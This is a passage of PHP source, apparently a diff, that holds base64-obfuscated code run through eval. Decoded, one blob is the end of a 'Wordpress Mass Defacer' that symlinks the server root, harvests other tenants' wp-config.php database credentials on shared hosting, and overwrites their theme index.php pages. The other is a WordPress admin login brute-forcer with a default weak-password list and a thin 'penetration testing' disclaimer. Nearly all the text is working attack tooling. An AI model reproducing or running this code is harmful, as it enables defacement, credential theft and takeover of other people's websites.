ZmFsc2UpIHsNCiAgICAgICAgICAgICRvdXRwdXQuPSAiWy1dIFN1Y2Nlc3NmdWwgTG9naW48YnIgLz4iOw0KICAgICAgICB9IGVsc2Ugew0KICAgICAgICAgICAgJG91dHB1dC49ICJbK10gU3VjY2Vzc2Z1bCBMb2dpbjxiciAvPiI7DQogICAgICAgIH0NCg0KICAgICAgICAkdXJsMj0kc2l0ZV91cmwuIi93cC1hZG1pbi90aGVtZS1lZGl0b3IucGhwP2ZpbGU9L3RoZW1lcy8iLiR0ZW1wbGF0ZS4nL2luZGV4LnBocCZ0aGVtZT0nLnVybGVuY29kZSgkY3VycmVudF90aGVtZSkuJyZkaXI9dGhlbWUnOw0KICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVJMLCAkdXJsMik7DQogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9GT0xMT1dMT0NBVElPTiwgMCk7DQogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwxKTsNCiAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgMCk7DQogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VU0VSQUdFTlQsICR1c2VyYWdlbnQpOw0KICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfQ09PS0lFSkFSLCAiQ09PS0lFLnR4dCIpOw0KICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfQ09PS0lFRklMRSwgIkNPT0tJRS50eHQiKTsNCiAgICAgICAgJGJ1ZmZlcjAgPSBjdXJsX2V4ZWMoJGNoKTsNCg0KICAgICAgICAkX3dwbm9uY2UgPSBlbnRyZTJ2MigkYnVmZmVyMCwnPGlucHV0IHR5cGU9ImhpZGRlbiIgaWQ9Il93cG5vbmNlIiBuYW1lPSJfd3Bub25jZSIgdmFsdWU9IicsJyIgLz4nKTsNCiAgICAgICAgJF9maWxlID0gZW50cmUydjIoJGJ1ZmZlcjAsJzxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImZpbGUiIHZhbHVlPSInLCciIC8+Jyk7DQoNCiAgICAgICAgaWYoc3Vic3RyX2NvdW50KCRfZmlsZSwiL2luZGV4LnBocCIpICE9IDApew0KICAgICAgICAgICAgJG91dHB1dC49ICJbK10gaW5kZXgucGhwIE9wZW5lZDxiciAvPiI7DQogICAgICAgIH0gZWxzZSB7DQogICAgICAgICAgICAkb3V0cHV0Lj0gIlstXSBpbmRleC5waHAgVW5hYmxlIHRvIG9wZW48YnIgLz4iOw0KICAgICAgICB9DQoNCiAgICAgICAgJHVybDI9JHNpdGVfdXJsLiIvd3AtYWRtaW4vdGhlbWUtZWRpdG9yLnBocCI7DQogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICR1cmwyKTsNCiAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1BPU1QsIDEpOw0KICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUE9TVEZJRUxEUywibmV3Y29udGVudD0iLiRjb250ZW50LiImYWN0aW9uPXVwZGF0ZSZmaWxlPSIuJF9maWxlLiImX3dwbm9uY2U9Ii4kX3dwbm9uY2UuIiZzdWJtaXQ9VXBkYXRlIEZpbGUiKTsNCiAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0ZPTExPV0xPQ0FUSU9OLCAxKTsNCiAgICAgICAgY3VybF9zZXRvcHQoJGNoLENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsMSk7DQogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIDApOw0KICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVNFUkFHRU5ULCAkdXNlcmFnZW50KTsNCiAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0NPT0tJRUpBUiwgIkNPT0tJRS50eHQiKTsNCiAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0NPT0tJRUZJTEUsICJDT09LSUUudHh0Iik7DQogICAgICAgICRidWZmZXIgPSBjdXJsX2V4ZWMoJGNoKTsNCiAgICAgICAgY3VybF9jbG9zZSgkY2gpOw0KDQogICAgICAgICRwb3MgPSBzdHJwb3MoJGJ1ZmZlciwnPGRpdiBpZD0ibWVzc2FnZSIgY2xhc3M9InVwZGF0ZWQiPicpOw0KICAgICAgICAkY29uZCA9IDA7DQogICAgICAgIGlmKCRwb3MgPT09IGZhbHNlKSB7DQogICAgICAgICAgICAkb3V0cHV0Lj0gIlstXSBpbmRleC5waHAgRmFpbGVkPGJyIC8+IjsNCiAgICAgICAgfSBlbHNlIHsNCiAgICAgICAgICAgICRvdXRwdXQuPSAiWytdIGluZGV4LnBocCBGYWlsZWQrPGJyIC8+IjsNCiAgICAgICAgICAgICRjb25kID0gMTsNCiAgICAgICAgfSB9IGVsc2Ugew0KICAgICAgICAkb3V0cHV0Lj0gIlstXSBEQiBFcnJvcjxiciAvPiI7DQogICAgfQ0KICAgIGdsb2JhbCAkYmFzZV9wYXRoOw0KICAgIHVubGluaygkYmFzZV9wYXRoLidDT09LSUUudHh0Jyk7DQogICAgcmV0dXJuIGFycmF5KCdjb25kJz0+JGNvbmQsICdvdXRwdXQnPT4kb3V0cHV0KTsNCn0NCg0KZnVuY3Rpb24gZXhlY19tb2RlXzEoJGRlZl91cmwpIHsNCg0KICAgIEBta2Rpcignc3ltJywwNzc3KTsNCiAgICAkd3IgID0gIk9wdGlvbnMgYWxsIFxuIERpcmVjdG9yeUluZGV4IFN1eC5odG1sIFxuIEFkZFR5cGUgdGV4dC9wbGFpbiAucGhwIFxuIEFkZEhhbmRsZXIgc2VydmVyLXBhcnNlZCAucGhwIFxuICBBZGRUeXBlIHRleHQvcGxhaW4gLmh0bWwgXG4gQWRkSGFuZGxlciB0eHQgLmh0bWwgXG4gUmVxdWlyZSBOb25lIFxuIFNhdGlzZnkgQW55IjsNCiAgICAkZnAgPSBAZm9wZW4gKCdzeW0vLmh0YWNjZXNzJywndycpOw0KICAgIGZ3cml0ZSgkZnAsICR3cik7DQogICAgQHN5bWxpbmsoJy8nLCdzeW0vcm9vdCcpOw0KICAgICRkb21pbmlvcyA9IEBmaWxlX2dldF9jb250ZW50cygiL2V0Yy9uYW1lZC5jb25mIik7DQogICAgQHByZWdfbWF0Y2hfYWxsKCcvLio/em9uZSAiKC4qPykiIHsvJywgJGRvbWluaW9zLCAkb3V0KTsNCiAgICAkb3V0WzFdID0gYXJyYXlfdW5pcXVlKCRvdXRbMV0pOw0KICAgICRudW1lcm9fZG9taW5pb3MgPSBjb3VudCgkb3V0WzFdKTsNCiAgICBlY2hvICJUb3RhbCBXZWJzaXRlczogJG51bWVyb19kb21pbmlvcyA8YnI+PGJyIC8+IjsNCiAgICAkZGVmID0gZmlsZV9nZXRfY29udGVudHMoJGRlZl91cmwpOw0KICAgICRkZWYgPSB1cmxlbmNvZGUoJGRlZik7DQogICAgJGJhc2VfdXJsID0gJ2h0dHA6Ly8nLiRfU0VSVkVSWydTRVJWRVJfTkFNRSddLmRpcm5hbWUoJF9TRVJWRVJbJ1NDUklQVF9OQU1FJ10pLicvc3ltL3Jvb3QvaG9tZS8nOw0KICAgICRvdXRwdXQgPSBmb3BlbignZGVmYWNlZC5odG1sJywgJ2ErJyk7DQogICAgJF9TRVNTSU9OWydjb3VudDEnXSA9IChpc3NldCgkX0dFVFsnc3QnXSkgJiYgJF9HRVRbJ3N0J10hPScnKSA/IChpc3NldCgkX1NFU1NJT05bJ2NvdW50MSddKSA/ICRfU0VTU0lPTlsnY291bnQxJ10gOjAgKSA6IDA7DQogICAgJF9TRVNTSU9OWydjb3VudDInXSA9IChpc3NldCgkX0dFVFsnc3QnXSkgJiYgJF9HRVRbJ3N0J10hPScnKSA/IChpc3NldCgkX1NFU1NJT05bJ2NvdW50MiddKSA/ICRfU0VTU0lPTlsnY291bnQyJ10gOjAgKSA6IDA7DQogICAgZWNobyAnPHRhYmxlIHN0eWxlPSJ3aWR0aDo3NSU7Ij48dHIgc3R5bGU9ImJhY2tncm91bmQ6cmdiYSgxNjAsIDgyLCA0NSwwLjYpOyI+PHRoPklEPC90aD48dGg+U0lEPC90aD48dGg+RG9tYWluPC90aD48dGg+U2NyaXB0PC90aD48dGg+UHJvY2VzczwvdGg+PHRoPlJlc3VsdHM8L3RoPjwvdHI+JzsNCiAgICAkaiA9IDE7DQogICAgJHN0ID0gKGlzc2V0KCRfR0VUWydzdCddKSAmJiAkX0dFVFsnc3QnXSE9JycpID8gJF9HRVRbJ3N0J10gOiAwOw0KICAgIGZvcigkaSA9ICRzdDsgJGkgPD0gJG51bWVyb19kb21pbmlvczsgJGkrKykNCiAgICB7DQogICAgICAgICRkb21haW4gPSAkb3V0WzFdWyRpXTsNCiAgICAgICAgJGRvbm9fYXJxdWl2byA9IEBmaWxlb3duZXIoIi9ldGMvdmFsaWFzZXMvIi4kZG9tYWluKTsNCiAgICAgICAgJGluZm9zID0gQHBvc2l4X2dldHB3dWlkKCRkb25vX2FycXVpdm8pOw0KICAgICAgICANCiAgICAgICAgJGNvbmZpZzAyID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCRiYXNlX3VybC4kaW5mb3NbJ25hbWUnXS4iL3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHAiKTsNCg0KICAgICAgICAkY2xzID0gKCRqICUgMiA9PSAwKSA/ICdjbGFzcz0iZXZlbiInIDogJ2NsYXNzPSJvZGQiJzsNCg0KICAgICAgICBpZigkY29uZmlnMDIgJiYgcHJlZ19tYXRjaCgnL0RCX05BTUUvaScsJGNvbmZpZzAyKSl7DQogICAgICAgICAgICBlY2hvICc8dHIgJy4kY2xzLic+PHRkIGFsaWduPSJjZW50ZXIiPicuKCRqKyspLic8L3RkPjx0ZCBhbGlnbj0iY2VudGVyIj4nLiRpLic8L3RkPjx0ZD48YSBocmVmPSJodHRwOi8vJy4kZG9tYWluLiciIHRhcmdldD0iYmxhbmsiPicuJGRvbWFpbi4nPC9hPjwvdGQ+JzsNCiAgICAgICAgICAgIGVjaG8gJzx0ZCBhbGlnbj0iY2VudGVyIj48Zm9udCBjb2xvcj0ieWVsbG93Ij5XT1JEUFJFU1M8L2ZvbnQ+PC90ZD4nOw0KICAgICAgICAgICAgJHJlcyA9IGluZGV4X2NoYW5nZXJfd3AoJGNvbmZpZzAyLCAkZGVmKTsNCiAgICAgICAgICAgIGVjaG8gJzx0ZD4nLiRyZXNbJ291dHB1dCddLic8L3RkPic7DQogICAgICAgICAgICBpZigkcmVzWydjb25kJ10pIHsNCiAgICAgICAgICAgICAgICBlY2hvICc8dGQgYWxpZ249ImNlbnRlciI+PHNwYW4gY2xhc3M9ImdyZWVuIj5IQUNLRUQ8L3NwYW4+PC90ZD4nOw0KICAgICAgICAgICAgICAgIGZ3cml0ZSgkb3V0cHV0LCAnaHR0cDovLycuJGRvbWFpbi4iPGJyPiIpOw0KICAgICAgICAgICAgICAgICRfU0VTU0lPTlsnY291bnQyJ10gPSAkX1NFU1NJT05bJ2NvdW50MiddICsgMTsNCiAgICAgICAgICAgIH0gZWxzZSB7DQogICAgICAgICAgICAgICAgZWNobyAnPHRkIGFsaWduPSJjZW50ZXIiPjxzcGFuIGNsYXNzPSJyZWQiPnVuc3VjY2Vzc2Z1bDwvc3Bhbj48L3RkPic7DQogICAgICAgICAgICB9DQogICAgICAgICAgICBlY2hvICc8L3RyPic7DQogICAgICAgIH0NCiAgICB9DQogICAgZWNobyAnPC90YWJsZT4nOw0KICAgIGVjaG8gJzxoci8+JzsNCiAgICBlY2hvICdUb3RhbCBEZWZhY2UgPSAnLigkX1NFU1NJT05bJ2NvdW50MSddKyRfU0VTU0lPTlsnY291bnQyJ10pLic8YnIgLz4nOw0KICAgIGVjaG8gJzxhIGhyZWY9ImRlZmFjZWQuaHRtbCIgdGFyZ2V0PSJfYmxhbmsiPkxpc3QgV2Vic2l0ZXMgRGVmYWNlZDwvYT48YnIgLz4nOw0KfQ0KDQplY2hvICc8IURPQ1RZUEUgaHRtbD4NCjxodG1sPg0KDQo8aGVhZD4NCg0KICAgIDx0aXRsZT48L3RpdGxlPg0KICAgIA0KCTxwPg0KCTxoMiBzdHlsZT0iY29sb3I6I0ZGMDAwMDt0ZXh0LWFsaWduOiBjZW50ZXI7Ij5Xb3JkcHJlc3MgTWFzcyBEZWZhY2VyIFByaXZhdGU8L2gyPg0KCTxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+DQogICAgICAgIGJvZHkge2JhY2tncm91bmQtcG9zaXRpb246IDUwJSA1MCU7DQoJY29sb3I6IHdoaXRlOyAJZm9udC1mYW1pbHk6ICJUcmVidWNoZXQgTVMiLEFyaWFsOwltYXJnaW46MDsJcGFkZGluZzowOw0KCWJhY2tncm91bmQtY29sb3I6ICMwMDA7DQoJYmFja2dyb3VuZC1yZXBlYXQ6IG5vLXJlcGVhdDsNCn0NCiAgICAgICAgLmhlYWRlciB7cG9zaXRpb246Zml4ZWQ7d2lkdGg6MTAwJTt0b3A6MDtiYWNrZ3JvdW5kOiMwMDA7fQ0KICAgICAgICAuZm9vdGVyIHtwb3NpdGlvbjpmaXhlZDt3aWR0aDoxMDAlO2JvdHRvbTowO2JhY2tncm91bmQ6IzAwMDt9DQogICAgICAgIGlucHV0W3R5cGU9InN1Ym1pdCJdeyAxcHggc29saWQgIzAwMDAwMDt9DQogICAgICAgIGlucHV0W3R5cGU9InN1Ym1pdCJdOmhvdmVye2NvbG9yOlNlYVNoZWxsO30NCiAgICAgICAgaW5wdXRbdHlwZT0icmFkaW8iXXttYXJnaW4tdG9wOiAwO30NCiAgICAgICAgLmV2ZW4ge2JhY2tncm91bmQtY29sb3I6IHJnYmEoMjUsIDI1LCAyNSwgMC42KTt9DQogICAgICAgIC5vZGQge2JhY2tncm91bmQtY29sb3I6IHJnYmEoMTAyLCAxMDIsIDEwMiwgMC42KTt9DQogICAgICAgIGEge2NvbG9yOiNmZmY7fSBhOmhvdmVyIHtjb2xvcjojMDBCRkZGO30NCiAgICAgICAgZmllbGRzZXR7Ym9yZGVyOiAxcHggc29saWQgZ3JleTsgYmFja2dyb3VuZDogcmdiYSgwLDAsMCwwLjcpOyB3aWR0aDogNjAwcHg7IG1hcmdpbjogMCBhdXRvO21pbi1oZWlnaHQ6MjQwcHg7fQ0KICAgICAgICB0ZXh0YXJlYXtiYWNrZ3JvdW5kOiByZ2JhKDAsMCwwLDAuNik7IGNvbG9yOiB3aGl0ZTt9DQogICAgICAgIC5ncmVlbiB7Y29sb3I6IzAwRkYwMDtmb250LXdlaWdodDpib2xkO30NCiAgICAgICAgLnJlZCB7Y29sb3I6I0ZGMDAwMDtmb250LXdlaWdodDpib2xkO30NCiAgICAgICAgLmtpbGxtZSB7cG9zaXRpb246IGZpeGVkOyB0b3A6IDIwcHg7IHJpZ2h0OiAyMHB4OyBib3JkZXI6IDJweCBzb2xpZCB5ZWxsb3c7IHBhZGRpbmc6IDEwcHg7IGZvbnQtc2l6ZTogMjBweDsgY29sb3I6IHJlZDsgZm9udC13ZWlnaHQ6IGJvbGQ7fQ0KICAgIDwvc3R5bGU+PC9wPg0KICAgIDxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij4NCiAgICAgICAgZnVuY3Rpb24gY2hhbmdlKCkgew0KICAgICAgICAgICAgaWYoZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoXCdyY2RcJykuY2hlY2tlZCA9PSB0cnVlKSB7DQogICAgICAgICAgICAgICAgZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoXCd0cmFcJykuc3R5bGUuZGlzcGxheSA9IFwnXCc7DQogICAgICAgICAgICB9IGVsc2Ugew0KICAgICAgICAgICAgICAgIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKFwndHJhXCcpLnN0eWxlLmRpc3BsYXkgPSBcJ25vbmVcJzsNCiAgICAgICAgICAgIH0NCiAgICAgICAgfQ0KICAgICAgICBmdW5jdGlvbiBoaWRlKCkgew0KICAgICAgICAgICAgZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoXCd0cmFcJykuc3R5bGUuZGlzcGxheSA9IFwnbm9uZVwnOw0KICAgICAgICB9DQogICAgPC9zY3JpcHQ+DQo8L2hlYWQ+DQo8Ym9keT4NCjxkaXYgY2xhc3M9ImZvb3RlciI+DQogICAgPGgzIHN0eWxlPSJ0ZXh0LWFsaWduOiBjZW50ZXI7Ij4mbmJzcDs8L2gzPg0KPC9kaXY+DQo8ZGl2IHN0eWxlPSJiYWNrZ3JvdW5kOiByZ2JhKDAsMCwwLDAuNSk7cGFkZGluZzo5MHB4IDAgNjVweCAwOyI+DQogICAgJzsNCiAgICBpZighaXNzZXQoJF9QT1NUWydmb3JtX2FjdGlvbiddKSl7DQogICAgZWNobyAnPGRpdiBhbGlnbj0iY2VudGVyIj4NCiAgICAgICAgPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCI+DQogICAgICAgICAgICA8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJmb3JtX2FjdGlvbiIgdmFsdWU9IjEiPjxicj5pbmRleCB1cmw6DQoJCQk8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0iaW5kZXhhZHJlc2kiIHZhbHVlPSJodHRwOi8vc2l0ZS5jb20vaW5kZXguaHRtbCIgLz48YnI+DQogICAgICAgICAgICA8aW5wdXQgY2xhc3M9c3VibWl0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IiEhIFNUQVJUICEhIiBuYW1lPSJTdWJtaXQiPg0KICAgICAgICA8L2Zvcm0+DQogICAgPC9kaXY+JzsNCiAgICB9IA0KICAgIGVjaG8gJzxkaXYgYWxpZ249ImNlbnRlciI+JzsNCiAgICBpZigkX1BPU1RbJ2Zvcm1fYWN0aW9uJ10gPT0gMSkgew0KICAgICAgICAgICAgZXhlY19tb2RlXzEoJF9QT1NUWydpbmRleGFkcmVzaSddKTsNCiAgICB9DQogICAgZWNobyAnPC9kaXY+DQogICAgPC9kaXY+DQoJDQoJDQoJDQoJDQo8L2JvZHk+DQo8L2h0bWw+JzsNCj8+"));
- break;
- case "PHP_78":
- eval(base64_decode("ZWNobyAiDQo8IS0tDQpXb3JkcHJlc3MgQWRtaW4gUGFuZWwgUGVuZXRyYXRpb24gVGVzdGluZw0KViAxDQpQUzogdGhpcyB0b29sIGlzIGZvciBwZW5ldHJhdGlvbiB0ZXN0aW5nIGFuZCBlZHVjYXRpb25hbCBwdXJwb3NlLCBodHRwOi8vd3d3LnY0LXRlYW0uY29tL2NjLyBpcyBub3QgcmVzcG9uc2libGUgYXQgYW55IGJhZCB1c2luZyBmb3IgdGhpcyB0b29sLg0KDQpUaGlzIHByb2dyYW0gaXMgZnJlZSBzb2Z0d2FyZTogeW91IGNhbiByZWRpc3RyaWJ1dGUgaXQgYW5kL29yIG1vZGlmeQ0KaXQgdW5kZXIgdGhlIHRlcm1zIG9mIHRoZSBHTlUgR2VuZXJhbCBQdWJsaWMgTGljZW5zZSBhcyBwdWJsaXNoZWQgYnkNCnRoZSBGcmVlIFNvZnR3YXJlIEZvdW5kYXRpb24sIGVpdGhlciB2ZXJzaW9uIDMgb2YgdGhlIExpY2Vuc2UsIG9yDQooYXQgeW91ciBvcHRpb24pIGFueSBsYXRlciB2ZXJzaW9uLg0KLS0+DQoiOw0KDQplcnJvcl9yZXBvcnRpbmcoMCk7DQpzZXRfdGltZV9saW1pdCgwKTsNCmlnbm9yZV91c2VyX2Fib3J0KHRydWUpOw0KPz4NCjxodG1sPg0KPGhlYWQ+DQo8dGl0bGU+PC90aXRsZT4NCjxtZXRhIGh0dHAtZXF1aXY9Q29udGVudC1UeXBlIGNvbnRlbnQ9dGV4dC9odG1sOyBjaGFyc2V0PXV0Zi04IGNoYXJzZXQ9VVRGLTg+DQoNCjxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+DQpib2R5IHsNCgljb2xvcjogd2hpdGU7DQoJfQ0KdGV4dGFyZWEgew0KCWJvcmRlci1yYWRpdXM6IDhweDsNCgljb2xvcjogd2hpdGU7DQoJYmFja2dyb3VuZC1jb2xvcjpibGFjazsNCn0NCmlucHV0W3R5cGU9c3VibWl0XSAsIC5zdWJtaXR7DQoJCWJhY2tncm91bmQtY29sb3I6YmxhY2s7DQoJCWNvbG9yOndoaXRlOw0KCQlib3JkZXItcmFkaXVzOjhweDsNCn0NCnAgew0KCWZvbnQtc2l6ZTogMTBweDsNCgl0ZXh0LWFsaWduOiBjZW50ZXI7DQp9DQphOmxpbmssYTpob3ZlcixhOnZpc2l0ZWQgew0KCWNvbG9yOnBpbms7DQp9DQo8L3N0eWxlPg0KPC9oZWFkPg0KPCEtLSB2NC10ZWFtIHwgV29yZFByZXNzIEFkbWluIFBhbmVsIFBlbmV0cmF0aW9uIFRlc3RpbmcgLS0+DQo8Y2VudGVyPg0KPHA+Jm5ic3A7PC9wPg0KPGZvcm0gZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbWV0aG9kPSJQT1NUIj4NCiAgPHRhYmxlIHdpZHRoPSc2MjQnIGJvcmRlcj0nMCcgaWQ9J0JveCc+DQogICAgPHRyPg0KPHRkIHdpZHRoPSc0JSc+Jm5ic3A7PC90ZD4NCjx0ZCB3aWR0aD0iOTYlIiBjb2xzcGFuPSIzIiBhbGlnbj0iY2VudGVyIiA+PHA+V29yZFByZXNzIEFkbWluIFBhbmVsIFBlbmV0cmF0aW9uIFRlc3RpbmcgPC9wPjwvdGQ+DQo8L3RyPg0KICAgIDx0cj4NCiAgICAgIDx0ZCA+Jm5ic3A7PC90ZD4NCiAgICAgIDx0ZCA+PHA+SG9zdHM6PC9wPjwvdGQ+DQogICAgICA8dGQgPjxwPiBVc2Vyczo8L3A+PC90ZD4NCiAgICAgIDx0ZCA+PHA+UGFzc3dvcmRzOjwvcD48L3RkPg0KICAgIDwvdHI+DQogICAgPHRyPg0KICAgICAgPHRkPiZuYnNwOzwvdGQ+DQogICAgICA8dGQgPjx0ZXh0YXJlYSBuYW1lPSJob3N0cyIgY29scz0iMzAiIHJvd3M9IjEwIiA+PD9waHAgaWYoJF9QT1NUKXtlY2hvICRfUE9TVFsnaG9zdHMnXTt9ID8+PC90ZXh0YXJlYT48L3RkPg0KICAgICAgPHRkID48dGV4dGFyZWEgbmFtZT0idXNlcm5hbWVzIiBjb2xzPSIzMCIgcm93cz0iMTAiICA+PD9waHAgaWYoJF9QT1NUKXtlY2hvICRfUE9TVFsndXNlcm5hbWVzJ107fWVsc2Uge2VjaG8gImFkbWluIjt9ID8+PC90ZXh0YXJlYT48L3RkPg0KICAgICAgPHRkID48dGV4dGFyZWEgbmFtZT0icGFzc3dvcmRzIiBjb2xzPSIzMCIgcm93cz0iMTAiICA+PD9waHAgaWYoJF9QT1NUKXtlY2hvICRfUE9TVFsncGFzc3dvcmRzJ107fWVsc2Uge2VjaG8gImFkbWluXG5hZG1pbmlzdHJhdG9yXG4xMjMxMjNcbjEyMzMyMVxuMTIzNDU2XG4xMjM0NTY3XG4xMjM0NTY3OFxuMTIzNDU2Nzg5XG4xMjM0NTYxMjM0NTZcbmFkbWluMjAxMFxuYWRtaW4yMDExXG5wYXNzd29yZFxuUEBzc1cwcmRcbiFAIyQlXlxuIUAjJCVeJiooXG4oKiZeJSQjQCFcbjExMTExMVxuMjIyMjIyXG4zMzMzMzNcbjQ0NDQ0NFxuNTU1NTU1XG42NjY2NjZcbjc3Nzc3N1xuODg4ODg4XG45OTk5OTkiO30gPz48L3RleHRhcmVhPjwvdGQ+DQogICAgPC90cj4NCjx0cj48dGQgY29sc3Bhbj0iNCI+PGlucHV0IHR5cGU9InN1Ym1pdCIgbmFtZT0ic3VibWl0IiB2YWx1ZT0iQnJ1dGUgTm93IiBjbGFzcz0ic3VibWl0IiAgLz4NCjw/cGhwDQppZigkX1BPU1QpDQp7DQoJJGhvc3RzID0gdHJpbShmaWx0ZXIoJF9QT1NUWydob3N0cyddKSk7DQoJJHBhc3N3b3JkcyA9IHRyaW0oZmlsdGVyKCRfUE9TVFsncGFzc3dvcmRzJ10pKTsNCgkkdXNlcm5hbWVzID0gdHJpbShmaWx0ZXIoJF9QT1NUWyd1c2VybmFtZXMnXSkpOw0KDQoJaWYoJHBhc3N3b3JkcyAmJiAkdXNlcm5hbWVzICYmICRob3N0cykNCgl7DQoJCSRob3N0c19leHBsb2RlID0gZXhwbG9kZSgiXG4iLCAkaG9zdHMpOw0KCQkkdXNlcm5hbWVzX2V4cGxvZGUgPSBleHBsb2RlKCJcbiIsICR1c2VybmFtZXMpOw0KICAgIAkkcGFzc3dvcmRzX2V4cGxvZGUgPSBleHBsb2RlKCJcbiIsICRwYXNzd29yZHMpOw0KDQoJCWZvcmVhY2goJGhvc3RzX2V4cGxvZGUgYXMgJGhvc3QpDQoJCXsNCgkJCSRob3N0ID0gUmVtb3ZlTGFzdFNsYXNoKCRob3N0KTsNCgkJCSRoYWNrZWQgPSAwOw0KCQkJJGhvc3QgPSBzdHJfcmVwbGFjZShhcnJheSgiaHR0cDovLyIsImh0dHBzOi8vIiwid3d3LiIpLCIiLHRyaW0oJGhvc3QpKTsNCgkJCSRob3N0ID0gImh0dHA6Ly8iLiRob3N0Ow0KCQkJJHdwQWRtaW4gPSAkaG9zdC4nL3dwLWFkbWluLyc7DQoNCgkJCWlmKCF1cmxfZXhpc3RzKCRob3N0LiIvd3AtbG9naW4ucGhwIikpDQoJCQl7ZWNobyAiPHA+Ii4kaG9zdC4iID0+IDxmb250IGNvbG9yPSdyZWQnPkVycm9yIEluIExvZ2luIFBhZ2UgITwvZm9udD48L3A+IjtvYl9mbHVzaCgpO2ZsdXNoKCk7Y29udGludWU7fQ0KDQoJCQlmb3JlYWNoKCR1c2VybmFtZXNfZXhwbG9kZSBhcyAkdXNlcm5hbWUpDQoJCQl7DQoJCQkJZm9yZWFjaCgkcGFzc3dvcmRzX2V4cGxvZGUgYXMgJHBhc3N3b3JkKQ0KCQkJCXsNCgkJCQkJJGNoICAgPSAgICAgY3VybF9pbml0KCk7DQoJCQkJCWN1cmxfc2V0b3B0KCRjaCxDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLDEpOw0KCQkJCQljdXJsX3NldG9wdCgkY2gsQ1VSTE9QVF9VUkwsJGhvc3QuJy93cC1sb2dpbi5waHAnKTsNCgkJCQkJY3VybF9zZXRvcHQoJGNoLENVUkxPUFRfQ09PS0lFSkFSLCJjb2tpLnR4dCIpOw0KCQkJCQljdXJsX3NldG9wdCgkY2gsQ1VSTE9QVF9DT09LSUVGSUxFLCJjb2tpLnR4dCIpOw0KCQkJCQljdXJsX3NldG9wdCgkY2gsQ1VSTE9QVF9GT0xMT1dMT0NBVElPTiwxKTsNCgkJCQkJY3VybF9zZXRvcHQoJGNoLENVUkxPUFRfUE9TVCxUUlVFKTsNCgkJCQkJY3VybF9zZXRvcHQoJGNoLENVUkxPUFRfUE9TVEZJRUxEUywibG9nPSIuJHVzZXJuYW1lLiImcHdkPSIuJHBhc3N3b3JkLiImd3Atc3VibWl0PUdpcmkmIzgyMDc7Ii4iJnJlZGlyZWN0X3RvPSIuJHdwQWRtaW4uIiZ0ZXN0Y29va2llPTEiKTsNCgkJCQkJJGxvZ2luICAgID0JICAgY3VybF9leGVjKCRjaCk7DQoNCgkJCQkJaWYoZXJlZ2kgKCJwcm9maWxlLnBocCIsJGxvZ2luKSApDQoJCQkJCXsNCgkJCQkJCSRoYWNrZWQgPSAxOw0KCQkJCQkJZWNobyAiPHA+Ii4kaG9zdC4iID0+IFVzZXJOYW1lIDogWzxmb250IGNvbG9yPSdncmVlbic+Ii4kdXNlcm5hbWUuIjwvZm9udD5dIDogUGFzc3dvcmQgOiBbPGZvbnQgY29sb3I9J2dyZWVuJz4iLiRwYXNzd29yZC4iPC9mb250Pl08L3A+IjsNCgkJCQkJCW9iX2ZsdXNoKCk7Zmx1c2goKTticmVhazsNCgkJCQkJfQ0KCQkJCX0NCgkJCQlpZigkaGFja2VkID09IDEpe2JyZWFrO30NCgkJCX0NCgkJCWlmKCRoYWNrZWQgPT0gMCkNCgkJCXtlY2hvICI8cD4iLiRob3N0LiIgPT4gPGZvbnQgY29sb3I9J3JlZCc+RmFpbGVkICE8L2ZvbnQ+PC9wPiI7b2JfZmx1c2goKTtmbHVzaCgpO30NCgkJfQ0KCX0NCgllbHNlIHtlY2hvICI8cD48Zm9udCBjb2xvcj0ncmVkJz5BbGwgZmllbGRzIGFyZSBSZXF1aXJlZCAhIDwvZm9udD48L3A+Ijt9DQp9DQo/Pg0KPC90ZD48L3RyPg0KPC90YWJsZT48L2Zvcm0+DQoNCjwhLS0gdjQtdGVhbS5jb20gfCBXb3JkUHJlc3MgQWRtaW4gUGFuZWwgUGVuZXRyYXRpb24gVGVzdGluZyAtLT4NCjwvY2VudGVyPg0KPHA+DQogIDw/cGhwDQpmdW5jdGlvbiB1cmxfZXhpc3RzKCRzdHJVUkwpDQp7DQogICAgJHJlc1VSTCA9IGN1cmxfaW5pdCgpOw0KICAgIGN1cmxfc2V0b3B0KCRyZXNVUkwsIENVUkxPUFRfVVJMLCAkc3RyVVJMKTsNCiAgICBjdXJsX3NldG9wdCgkcmVzVVJMLCBDVVJMT1BUX0JJTkFSWVRSQU5TRkVSLCAxKTsNCiAgICBjdXJsX3NldG9wdCgkcmVzVVJMLCBDVVJMT1BUX0hFQU